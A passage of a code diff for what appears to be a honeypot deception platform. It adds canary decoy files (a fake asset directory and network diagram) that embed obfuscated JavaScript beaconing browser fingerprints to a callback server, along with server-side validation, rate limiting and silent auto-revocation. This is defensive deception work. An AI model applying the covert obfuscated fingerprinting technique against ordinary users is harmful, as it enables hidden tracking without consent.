subprocess.TimeoutExpired as e: + raise ObfuscatorError("javascript-obfuscator timed out") from e + if proc.returncode != 0: + raise ObfuscatorError( + f"javascript-obfuscator failed rc={proc.returncode} " + f"stderr={proc.stderr.strip()[:400]}" + ) + out = proc.stdout + if not out.strip(): + raise ObfuscatorError("javascript-obfuscator returned empty output") + return out + + +def render_fingerprint_js( + *, callback_token: str, http_base: str, mint_uuid: str, nonce: str, +) -> str: + """Build the obfuscated fingerprint JS for a single mint. + + Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and + ``{{MINT_NONCE}}`` in the payload template, then runs it through + :func:`obfuscate` with a seed derived from the callback token. + The nonce is appended as ``&k=`` on every beacon URL the JS emits; + the worker rejects fingerprint payloads whose ``?k=`` doesn't match + the row's :attr:`CanaryToken.fingerprint_nonce`. + """ + template = _PAYLOAD.read_text(encoding="utf-8") + beacon = f"{http_base.rstrip('/')}/c/{callback_token}" + src = ( + template + .replace("{{BEACON_URL}}", beacon) + .replace("{{MINT_UUID}}", mint_uuid) + .replace("{{MINT_NONCE}}", nonce) + ) + return obfuscate(src, callback_token=callback_token) diff --git a/decnet/canary/package.json b/decnet/canary/package.json new file mode 100644 index 00000000..8ecf93fb --- /dev/null +++ b/decnet/canary/package.json @@ -0,0 +1,10 @@ +{ + "name": "decnet-canary-obfuscator", + "version": "0.1.0", + "private": true, + "description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.", + "main": "_obfuscate_helper.js", + "dependencies": { + "javascript-obfuscator": "^5.4.2" + } +} diff --git a/decnet/canary/paths.py b/decnet/canary/paths.py index 5700ad0f..b2b731a5 100644 --- a/decnet/canary/paths.py +++ b/decnet/canary/paths.py @@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = { "honeydoc": "/home/{user}/Documents/quarterly_report.html", "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx", "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf", + "fingerprint_html": "/home/{user}/Documents/asset_directory.html", + "fingerprint_svg": "/home/{user}/Documents/network_topology.svg", } _WINDOWS_DEFAULTS: dict[str, str] = { @@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = { "honeydoc": "/home/{user}/Documents/quarterly_report.html", "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx", "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf", + "fingerprint_html": "/home/{user}/Documents/asset_directory.html", + "fingerprint_svg": "/home/{user}/Documents/network_topology.svg", } diff --git a/decnet/canary/planter.py b/decnet/canary/planter.py index 6beae78b..8a80bc2b 100644 --- a/decnet/canary/planter.py +++ b/decnet/canary/planter.py @@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire. """ from __future__ import annotations -import asyncio -import base64 import os -import shlex -import time +from datetime import datetime, timedelta, timezone from secrets import token_urlsafe from typing import Any, Iterable, Optional @@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus from decnet.canary.base import CanaryArtifact, CanaryContext from decnet.canary.factory import get_generator from decnet.canary.paths import default_path_for +from decnet.decky_io import ( + delete_file_from_container, + resolve_topology_container, + write_file_to_container, +) from decnet.logging import get_logger from decnet.web.db.repository import BaseRepository log = get_logger("canary.planter") -_DOCKER = "docker" -_TIMEOUT = 8.0 # Container suffix — matches the orchestrator SSH driver's convention # (``-ssh``). Canary placement always happens through the # ssh container because every decky has one and it carries the most @@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str: return f"{decky_name}{_SSH_CONTAINER_SUFFIX}" -def _dirname(path: str) -> str: - idx = path.rfind("/") - if idx <= 0: - return "/" - return path[:idx] - - -async def _run( - argv: list[str], *, stdin_bytes: Optional[bytes] = None, -) -> tuple[int, str, str]: - try: - proc = await asyncio.create_subprocess_exec( - *argv, - stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None, - stdout=asyncio.subprocess.PIPE, - stderr=asyncio.subprocess.PIPE, - ) - except FileNotFoundError as exc: - return 127, "", f"argv[0] not found: {exc}" - try: - stdout, stderr = await asyncio.wait_for( - proc.communicate(input=stdin_bytes), timeout=_TIMEOUT, - ) - except asyncio.TimeoutError: - try: - proc.kill() - except ProcessLookupError: - pass - return 124, "", "timeout" - return ( - proc.returncode if proc.returncode is not None else -1, - stdout.decode("utf-8", "replace"), - stderr.decode("utf-8", "replace"), - ) - - -def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]: - """Compose the ``sh -c`` script + stdin payload for one artifact. - - Binary safety: we base64-encode on the host and stream the result - over stdin to ``base64 -d`` inside the container, so the bytes - never touch the argv (kernel ARG_MAX would reject anything larger - than ~128KB-2MB depending on the host). Both ``base64`` (coreutils) - and ``touch -d @`` are present on every Linux base image - we ship, so there's no per-distro branching. - """ - encoded = base64.b64encode(artifact.content) - mtime = int(time.time() + artifact.mtime_offset) - mode_str = oct(artifact.mode)[2:] - parts = [ - f"mkdir -p {shlex.quote(_dirname(artifact.path))}", - f"base64 -d > {shlex.quote(artifact.path)}", - f"chmod {mode_str} {shlex.quote(artifact.path)}", - f"touch -d @{mtime} {shlex.quote(artifact.path)}", - ] - return " && ".join(parts), encoded +# resolve_topology_container is re-exported from decky_io for back-compat +# with callers (tests, deploy hook) that imported it from this module +# before the decky_io extraction. +__all__ = [ + "plant", + "revoke", + "resolve_topology_container", + "seed_baseline", + "seed_baseline_topology", +] async def _publish( @@ -139,6 +93,7 @@ async def plant( repo: Optional[BaseRepository] = None, publish: bool = True, bus: Optional[BaseBus] = None, + container: Optional[str] = None, ) -> tuple[bool, Optional[str]]: """Write *artifact* into the decky's ssh container. @@ -157,13 +112,12 @@ async def plant( await repo.update_canary_token_state(token_uuid, "failed", err) return False, err - sh_cmd, stdin_payload = _build_plant_command(artifact) - # ``-i`` keeps stdin attached so base64 -d inside the container can - # consume the encoded payload streamed from the host. - argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd] - rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload) - success = rc == 0 - error = None if success else (stderr.strip()[:256] or f"rc={rc}") + target_container = container or _container_for(decky_name) + mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset) + success, error = await write_file_to_container( + target_container, artifact.path, artifact.content, + mode=artifact.mode, mtime=mtime, + ) if repo is not None: if success: @@ -182,8 +136,8 @@ async def plant( if not success: log.warning( - "canary.plant failed decky=%s token=%s rc=%d stderr=%r", - decky_name, token_uuid, rc, stderr[:120], + "canary.plant failed decky=%s token=%s container=%s err=%r", + decky_name, token_uuid, target_container, error, ) return success, error @@ -196,6 +150,7 @@ async def revoke( repo: Optional[BaseRepository] = None, publish: bool = True, bus: Optional[BaseBus] = None, + container: Optional[str] = None, ) -> tuple[bool, Optional[str]]: """Best-effort unlink + state transition + bus publish. @@ -203,11 +158,10 @@ async def revoke( the file is gone after the call (whether we deleted it or it was already missing); only docker / container-down errors return False. """ - sh_cmd = f"rm -f {shlex.quote(placement_path)}" - argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd] - rc, _stdout, stderr = await _run(argv) - success = rc == 0 - error = None if success else (stderr.strip()[:256] or f"rc={rc}") + target_container = container or _container_for(decky_name) + success, error = await delete_file_from_container( + target_container, placement_path, + ) if repo is not None: await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None) @@ -250,6 +204,7 @@ async def seed_baseline( persona: str = "linux", created_by: str = "system", bus: Optional[BaseBus] = None, + container: Optional[str] = None, ) -> list[dict[str, Any]]: """Plant the configured baseline canary set on one decky. @@ -293,9 +248,59 @@ async def seed_baseline( await plant( decky_name, artifact, token_uuid=token_uuid, repo=repo, publish=True, bus=bus, + container=container, ) out.append({ "token_uuid": token_uuid, "generator": gen_name, "kind": kind, "callback_token": slug, "placement_path": artifact.path, }) return out + + +async def seed_baseline_topology( + repo: BaseRepository, + topology_id: str, + *, + created_by: str = "system", + bus: Optional[BaseBus] = None, +) -> list[dict[str, Any]]: + """Plant baseline canaries on every decky in a MazeNET topology. + + Mirrors :func:`seed_baseline` for the topology path. Container name + resolution uses :func:`resolve_topology_container` since topology + deckies may not have an ssh service — in that case we target the + base container instead. + + Best-effort: failures on any single decky are logged inside + :func:`plant`; the deploy hook treats the return value as + informational. Returns a flat list of per-token dicts (with an added + ``decky_name`` key) across all deckies. + """ + from decnet.topology.persistence import hydrate + + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + log.warning( + "canary.seed_baseline_topology: topology %s not found", topology_id, + ) + return [] + + out: list[dict[str, Any]] = [] + for decky in hydrated["deckies"]: + cfg = decky.get("decky_config") or {} + decky_name = cfg.get("name") or decky.get("name") + if not decky_name: + continue + services = decky.get("services") or [] + container = resolve_topology_container(topology_id, decky_name, services) + # MazeNET deckies don't carry an OS persona today; default to + # linux (every base image we ship is Linux). + rows = await seed_baseline( + decky_name, repo, + persona="linux", created_by=created_by, bus=bus, + container=container, + ) + for r in rows: + r["decky_name"] = decky_name + out.append(r) + return out diff --git a/decnet/canary/worker.py b/decnet/canary/worker.py index 8218136d..3eea2573 100644 --- a/decnet/canary/worker.py +++ b/decnet/canary/worker.py @@ -26,9 +26,14 @@ crashes loudly rather than masking failures. from __future__ import annotations import asyncio +import base64 +import binascii +import json import os +import time +import uuid from datetime import datetime, timezone -from typing import Optional +from typing import Any, Optional from fastapi import FastAPI, Request, Response @@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex( ) +# Namespace used by fingerprint generators to derive mint UUID. +# Must stay in sync with fingerprint_html._MINT_NAMESPACE. +_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d") + +# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists. +# Maps (token_uuid, src_ip) -> list of monotonic timestamps. +# Not shared across worker restarts or processes — acceptable for MVP. +_FP_RATE_WINDOW_S = 60 +_FP_RATE_LIMIT = 30 +_fp_rate_buckets: dict[tuple[str, str], list[float]] = {} + + +def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool: + key = (token_uuid, src_ip) + now = time.monotonic() + cutoff = now - _FP_RATE_WINDOW_S + bucket = _fp_rate_buckets.get(key, []) + bucket = [t for t in bucket if t > cutoff] + if len(bucket) >= _FP_RATE_LIMIT: + _fp_rate_buckets[key] = bucket + return False + bucket.append(now) + _fp_rate_buckets[key] = bucket + return True + + +def _is_valid_fp_shape(fp: dict) -> bool: + """Layer B — structural sanity check on a decoded fingerprint blob.""" + if not isinstance(fp.get("mint"), str) or not fp["mint"]: + return False + known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"} + present = sum(1 for k in known_keys if isinstance(fp.get(k), dict)) + return present >= 3 + + def _http_base() -> str: return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/") @@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI: @app.get("/c/{slug}") async def callback(slug: str, request: Request) -> Response: + raw_nonce = request.query_params.get("k") + fp_meta, parsed_fp = _extract_fingerprint(request.query_params) + merged_headers = dict(request.headers) + if fp_meta: + merged_headers.update(fp_meta) await _record_hit( repo, bus, slug=slug, @@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI: user_agent=request.headers.get("user-agent"), request_path=str(request.url.path), dns_qname=None, - raw_headers=dict(request.headers), + raw_headers=merged_headers, + parsed_fp=parsed_fp, + raw_nonce=raw_nonce, ) # Always 200 with a tiny image so the attacker's client sees # a "success" — same return regardless of whether the slug is @@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI: return app +# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest +# overflow is handled via chunking (s/i/n + d). Anything larger than +# this on a single request is junk, so we drop it instead of letting an +# attacker inflate a trigger row indefinitely. +_FP_CHUNK_MAX = 8 * 1024 + + +def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]: + """Decode fingerprint-payload query params into (meta_dict, parsed_fp). + + The obfuscated browser payload may send three shapes on ``GET /c/``: + + * ``?o=1`` — bare-open beacon, fired before fingerprinting starts. + * ``?d=`` — single-shot fingerprint dump. + * ``?s=&i=&n=&d=`` — chunked dump. + + Returns a tuple of: + - ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers. + - ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None`` + when there's no ``?d=`` or decoding fails. + """ + out: dict[str, Any] = {} + parsed_fp: Optional[dict] = None + if not qp: + return out, parsed_fp + o = qp.get("o") if hasattr(qp, "get") else None + if o: + out["_fp_open"] = "1" + d = qp.get("d") if hasattr(qp, "get") else None + if not d: + return out, parsed_fp + if len(d) > _FP_CHUNK_MAX: + out["_fp_oversize"] = "1" + return out, parsed_fp + + sid = qp.get("s") + idx = qp.get("i") + total = qp.get("n") + if sid and idx and total: + out["_fp_sid"] = sid + out["_fp_idx"] = idx + out["_fp_total"] = total + out["_fp_chunk"] = d + return out, parsed_fp + + # Single-shot: decode and pass back as parsed_fp; validation runs in + # _record_hit after token lookup so we have the stored nonce at hand. + try: + padded = d + "=" * (-len(d) % 4) + raw = base64.urlsafe_b64decode(padded.encode("ascii")) + parsed = json.loads(raw.decode("utf-8")) + except (binascii.Error, ValueError, UnicodeDecodeError): + out["_fp_decode_error"] = "1" + return out, parsed_fp + if isinstance(parsed, dict): + parsed_fp = parsed + else: + out["_fp_decode_error"] = "1" + return out, parsed_fp + + def _client_ip(request: Request) -> str: # Honor X-Forwarded-For if the operator deployed behind a reverse # proxy. Take the leftmost address in the chain; everything after @@ -154,16 +262,58 @@ async def _record_hit( request_path: Optional[str], dns_qname: Optional[str], raw_headers: Optional[dict], + parsed_fp: Optional[dict] = None, + raw_nonce: Optional[str] = None, ) -> None: """Resolve slug -> token, persist a trigger, publish on the bus. Unknown slugs are silently swallowed: returning the same response for known and unknown slugs is the stealth posture, and persisting every random scan would clutter the DB. + + When *parsed_fp* is present (single-shot fingerprint decode succeeded), + it is validated through four layers before being merged into raw_headers: + A) nonce match against CanaryToken.fingerprint_nonce, + B) structural shape check, + C) mint UUID consistency, + D) per-(token, IP) rate limit. + Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag. + The trigger row always lands regardless — the GET hit is itself forensic. """ token = await repo.get_canary_token_by_slug(slug) if token is None: return + + final_headers: dict[str, Any] = dict(raw_headers or {}) + + if parsed_fp is not None: + stored_nonce: Optional[str] = token.get("fingerprint_nonce") + + # Layer A — nonce + if stored_nonce is not None and raw_nonce != stored_nonce: + final_headers["_fp_invalid_nonce"] = "1" + parsed_fp = None + + # Layer B — shape (only when nonce passed or no nonce enforced) + if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp): + final_headers["_fp_invalid_shape"] = "1" + parsed_fp = None + + # Layer C — mint UUID consistency + if parsed_fp is not None: + expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug)) + if parsed_fp.get("mint") != expected_mint: + final_headers["_fp_invalid_mint"] = "1" + parsed_fp = None + + # Layer D — rate limit + if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip): + final_headers["_fp_rate_limited"] = "1" + parsed_fp = None + + if parsed_fp is not None: + final_headers["_fp"] = parsed_fp + trigger_id = await repo.record_canary_trigger({ "token_uuid": token["uuid"], "occurred_at": datetime.now(timezone.utc), @@ -171,7 +321,7 @@ async def _record_hit( "user_agent": user_agent, "request_path": request_path, "dns_qname": dns_qname, - "raw_headers": raw_headers or {}, + "raw_headers": final_headers, }) try: await bus.publish( @@ -189,6 +339,22 @@ async def _record_hit( except Exception as e: # noqa: BLE001 — best effort log.warning("canary.triggered publish failed slug=%s err=%s", slug, e) + # Auto-deregister fingerprint canaries after the first valid fingerprint + # is collected. Slug goes dark; the stealth posture means the attacker + # sees the same 200 + GIF on the next hit — nothing reveals the revocation. + # Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain + # http/dns canaries are NOT auto-revoked. + if parsed_fp is not None and token.get("fingerprint_nonce") is not None: + try: + await repo.update_canary_token_state(token["uuid"], "revoked") + await bus.publish( + topics.canary(token["uuid"], topics.CANARY_REVOKED), + {"token_id": token["uuid"], "trigger_id": trigger_id, + "reason": "fingerprint_collected"}, + ) + except Exception as e: # noqa: BLE001 — trigger row already landed; best effort + log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e) + # ---------------------------- DNS surface -------------------------------- diff --git a/decnet/cli/canary.py b/decnet/cli/canary.py index 87af60ea..25011b0e 100644 --- a/decnet/cli/canary.py +++ b/decnet/cli/canary.py @@ -1,8 +1,13 @@ """``decnet canary`` — HTTP + DNS callback receiver for canary tokens. -Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a -``@app.command(name="canary")`` Typer entry point that delegates to -:func:`decnet.canary.worker.run`. +Two entry points share this module: + +* ``decnet canary`` — runs the worker process. Mirrors the shape of + :mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service`` + systemd unit so its argv must stay stable. +* ``decnet canary-install-toolchain`` — provisions the Node side of + the fingerprint-canary obfuscator. Idempotent; safe to call from + the API service unit's ``ExecStartPre``. Not master-only — any host that hosts deckies can run its own canary worker (the bus events stay local; the webhook worker on @@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``). """ from __future__ import annotations +import shutil +import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer +from pathlib import Path + import typer from . import utils as _utils from .utils import console, log +_TOOLCHAIN_TIMEOUT_S = 180 + def register(app: typer.Typer) -> None: @app.command(name="canary") @@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None: asyncio.run(run()) except KeyboardInterrupt: console.print("\n[yellow]Canary worker stopped.[/]") + + @app.command(name="canary-install-toolchain") + def canary_install_toolchain( + npm_bin: str = typer.Option( + "npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.", + ), + ) -> None: + """Install the Node-side toolchain used by fingerprint canaries. + + Runs ``npm install --omit=dev`` under the installed ``decnet/canary/`` + directory so the obfuscator's helper script can ``require()`` + ``javascript-obfuscator`` at mint time. Requires Node >= 18. + + Idempotent: re-running on an already-installed tree is fast + (npm short-circuits when ``node_modules/`` is up-to-date). + """ + import decnet.canary as _canary_pkg + canary_dir = Path(_canary_pkg.__file__).resolve().parent + if not (canary_dir / "package.json").is_file(): + console.print( + f"[red]canary package.json not found under {canary_dir}; " + "wheel may be missing the JS toolchain payload.[/]" + ) + raise typer.Exit(code=2) + if shutil.which(npm_bin) is None: + console.print( + f"[red]npm executable {npm_bin!r} not found on PATH. " + "Install Node >= 18 and re-run.[/]" + ) + raise typer.Exit(code=2) + console.print( + f"[cyan]installing canary toolchain[/] in {canary_dir}", + ) + try: + proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above + [npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"], + cwd=str(canary_dir), + capture_output=True, text=True, + timeout=_TOOLCHAIN_TIMEOUT_S, check=False, + ) + except subprocess.TimeoutExpired: + console.print("[red]npm install timed out after 3 minutes[/]") + raise typer.Exit(code=3) from None + if proc.returncode != 0: + console.print( + f"[red]npm install failed rc={proc.returncode}[/]\n" + f"{proc.stderr.strip()}" + ) + raise typer.Exit(code=proc.returncode) + console.print("[green]canary toolchain ready[/]") diff --git a/decnet/cli/init.py b/decnet/cli/init.py index adff99cc..f1fc0f5a 100644 --- a/decnet/cli/init.py +++ b/decnet/cli/init.py @@ -74,6 +74,7 @@ _CONFIG_PLACEHOLDER = """\ # master-host = 10.0.0.1 # syslog-port = 6514 # swarmctl-port = 8770 +# swarmctl-host = 127.0.0.1 # [logging] # system-log = /var/log/decnet/decnet.system.log diff --git a/decnet/cli/swarmctl.py b/decnet/cli/swarmctl.py index 687823c9..78fb9c00 100644 --- a/decnet/cli/swarmctl.py +++ b/decnet/cli/swarmctl.py @@ -16,8 +16,16 @@ from .utils import console, log def register(app: typer.Typer) -> None: @app.command() def swarmctl( - port: int = typer.Option(8770, "--port", help="Port for the swarm controller"), - host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"), + port: int = typer.Option( + 8770, "--port", + envvar="DECNET_SWARMCTL_PORT", + help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.", + ), + host: str = typer.Option( + "127.0.0.1", "--host", + envvar="DECNET_SWARMCTL_HOST", + help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.", + ), daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"), no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"), tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"), diff --git a/decnet/cli/topology.py b/decnet/cli/topology.py index f7cfe122..5f9f88ee 100644 --- a/decnet/cli/topology.py +++ b/decnet/cli/topology.py @@ -233,8 +233,8 @@ def _delete( topo = await repo.get_topology(topology_id) if topo is None: return False, "not-found" - if topo["status"] in _RUNNING: - return False, str(topo["status"]) + if topo.status in _RUNNING: + return False, str(topo.status) ok = await repo.delete_topology_cascade(topology_id) return ok, None diff --git a/decnet/clustering/campaign/impl/similarity.py b/decnet/clustering/campaign/impl/similarity.py index 2aa5bba8..38101405 100644 --- a/decnet/clustering/campaign/impl/similarity.py +++ b/decnet/clustering/campaign/impl/similarity.py @@ -342,7 +342,7 @@ def combined_campaign_weight( # ─── Adapter for synthetic-fixture tests ──────────────────────────────────── -def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def] +def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: """Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``. Treats one ``SyntheticAttacker`` as one identity — adequate for diff --git a/decnet/clustering/impl/similarity.py b/decnet/clustering/impl/similarity.py index 3e69ac37..9122eb69 100644 --- a/decnet/clustering/impl/similarity.py +++ b/decnet/clustering/impl/similarity.py @@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float: # ─── Adapter for the synthetic-corpus tests ───────────────────────────────── -def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def] +def from_synthetic(att) -> Observation: """Build an :class:`Observation` from a ``SyntheticAttacker``. Lives here so test code doesn't import the factory shape into the diff --git a/decnet/collector/worker.py b/decnet/collector/worker.py index 0d8717b6..d744cec1 100644 --- a/decnet/collector/worker.py +++ b/decnet/collector/worker.py @@ -75,6 +75,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset( ) _RL_MAX_ENTRIES: int = 10_000 +# APP-NAMEs we never want to see in the ingestion stream — native unix +# daemons that share a container with a DECNET service. Their logs are +# noise: sshd's "Failed password for root from X" duplicates the +# auth-helper's structured `auth_attempt` event, pam_unix repeats it +# again, and CRON/systemd/etc. say nothing about attacker behavior. +# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list). +_DROP_APPS: frozenset[str] = frozenset( + a.strip() + for a in os.environ.get( + "DECNET_COLLECTOR_DROP_APPS", + "sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon", + ).split(",") + if a.strip() +) + _rl_lock: threading.Lock = threading.Lock() _rl_last: dict[tuple[str, str, str, str], float] = {} @@ -82,10 +97,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {} def _should_ingest(parsed: dict[str, Any]) -> bool: """ Return True if this parsed event should be written to the JSON ingestion - stream. Rate-limited connection-lifecycle events return False when another - event with the same (attacker_ip, decky, service, event_type) was emitted - inside the dedup window. + stream. Drops native unix daemon noise (sshd, pam_unix, …) outright; + rate-limits connection-lifecycle events within a dedup window. """ + if parsed.get("service", "") in _DROP_APPS: + return False event_type = parsed.get("event_type", "") if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES: return True @@ -220,6 +236,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]: except ValueError: ts_formatted = ts_raw + # Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with + # "CMD ") get event_type rewritten to "command". `fields` stays empty + # so the frontend's msg-based pill rendering doesn't double up. + if event_type == "-" and msg.startswith("CMD "): + event_type = "command" + return { "timestamp": ts_formatted, "decky": decky, diff --git a/decnet/config_ini.py b/decnet/config_ini.py index a3747003..7db44abd 100644 --- a/decnet/config_ini.py +++ b/decnet/config_ini.py @@ -39,6 +39,7 @@ Shape:: master-host = 10.0.0.1 # required on agents syslog-port = 6514 swarmctl-port = 8770 + swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl` [logging] system-log = /var/log/decnet/decnet.system.log @@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = { "master-host": "DECNET_SWARM_MASTER_HOST", "syslog-port": "DECNET_SWARM_SYSLOG_PORT", "swarmctl-port": "DECNET_SWARMCTL_PORT", + "swarmctl-host": "DECNET_SWARMCTL_HOST", }, "logging": { "system-log": "DECNET_SYSTEM_LOGS", diff --git a/decnet/correlation/parser.py b/decnet/correlation/parser.py index 9740d490..65ace509 100644 --- a/decnet/correlation/parser.py +++ b/decnet/correlation/parser.py @@ -137,6 +137,19 @@ def parse_line(line: str) -> LogEvent | None: msg = tail.group(1).strip() if tail else "" attacker_ip = _extract_attacker_ip(fields, msg) + # Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command + # and a body like `CMD uid=0 user=root src=… pwd=… cmd=`. + # Without this rewrite they're invisible to the behavioral profiler, which + # filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger + # invocation uses --msgid command, so we must also handle the non-nil case. + if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields: + event_type = "command" + head, sep, cmd_rest = msg[4:].partition("cmd=") + for k, v in re.findall(r'(\w+)=(\S+)', head): + fields.setdefault(k, v) + if sep: + fields.setdefault("command", cmd_rest) + # Mutator-emitted transitions arrive on the same ingest stream but # belong in the substrate-state index, not the per-IP attacker one. kind: EventKind = ( diff --git a/decnet/correlation/reuse_worker.py b/decnet/correlation/reuse_worker.py index f1a5be5f..67d18929 100644 --- a/decnet/correlation/reuse_worker.py +++ b/decnet/correlation/reuse_worker.py @@ -70,7 +70,7 @@ async def run_reuse_loop( wake_tasks.append(asyncio.create_task( _run_control_listener_signal(bus, "reuse-correlator"), )) - except Exception as exc: # noqa: BLE001 + except Exception as exc: log.warning( "reuse correlator: bus unavailable, running in poll-only mode: %s", exc, @@ -86,7 +86,7 @@ async def run_reuse_loop( results = await engine.correlate_credential_reuse( repo, min_targets=min_targets, ) - except Exception: # noqa: BLE001 + except Exception: log.exception("reuse correlator: tick failed") results = [] @@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None: wake.set() except asyncio.CancelledError: raise - except Exception as exc: # noqa: BLE001 + except Exception as exc: log.warning( "reuse correlator: subscriber for %s died (%s); falling back to poll", pattern, exc, diff --git a/decnet/decky_io/__init__.py b/decnet/decky_io/__init__.py new file mode 100644 index 00000000..ef0008fe --- /dev/null +++ b/decnet/decky_io/__init__.py @@ -0,0 +1,39 @@ +"""Shared primitives for writing/deleting files inside running deckies. + +The canary planter and the orchestrator SSH driver both need to drop +bytes into a decky container's filesystem, then sometimes unlink them. +The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places +before this module existed. + +Public API: + +* :func:`write_file_to_container` — write bytes at a path, set mode, + optionally backdate mtime. +* :func:`delete_file_from_container` — best-effort ``rm -f``. +* :func:`resolve_topology_container` — pick the right docker container + for a MazeNET decky based on its services list. +* :func:`resolve_decky_container` — async helper that takes + ``(decky_name, topology_id?)``, hydrates the topology when needed, + and returns the docker container name. + +Container resolution conventions are documented in +:mod:`decnet.topology.compose`; we mirror them here without taking +a runtime dependency on the compose generator. +""" +from __future__ import annotations + +from .resolve import ( + resolve_decky_container, + resolve_topology_container, +) +from .write import ( + delete_file_from_container, + write_file_to_container, +) + +__all__ = [ + "delete_file_from_container", + "resolve_decky_container", + "resolve_topology_container", + "write_file_to_container", +] diff --git a/decnet/decky_io/resolve.py b/decnet/decky_io/resolve.py new file mode 100644 index 00000000..271ee491 --- /dev/null +++ b/decnet/decky_io/resolve.py @@ -0,0 +1,72 @@ +"""Decky-name → docker container name resolution. + +Two scopes: + +* **Fleet**: every fleet decky has a ``ssh`` service container named + ``-ssh`` (see :mod:`decnet.services.ssh`). We always + target it because it carries the most realistic filesystem layout. +* **MazeNET (topology)**: same ``-ssh`` convention when the + decky exposes the ssh service; otherwise the decky's base container + named ``decnet_t__`` (matches + :func:`decnet.topology.compose._container_name`). + +Keeping resolution centralised here means new ``docker exec`` callers +(file drops, future bulk planters, etc.) never need to learn the +naming conventions — they just call :func:`resolve_decky_container`. +""" +from __future__ import annotations + +from typing import Any, Iterable, Optional + +_SSH_CONTAINER_SUFFIX = "-ssh" + + +def resolve_topology_container( + topology_id: str, decky_name: str, services: Iterable[str], +) -> str: + """Container name for a MazeNET decky. + + See module docstring for the convention. Pure function — no I/O. + """ + if "ssh" in set(services): + return f"{decky_name}{_SSH_CONTAINER_SUFFIX}" + return f"decnet_t_{topology_id[:8]}_{decky_name}" + + +async def resolve_decky_container( + repo: Any, + decky_name: str, + *, + topology_id: Optional[str] = None, +) -> str: + """Resolve the docker container name for *decky_name*. + + Fleet path (``topology_id is None``): returns ``-ssh`` + unconditionally. No DB lookup — the caller is responsible for + knowing the decky exists; if it doesn't, the subsequent + ``docker exec`` returns a clear error. + + Topology path: hydrates the topology, looks up the decky's services + list, delegates to :func:`resolve_topology_container`. + + Raises: + 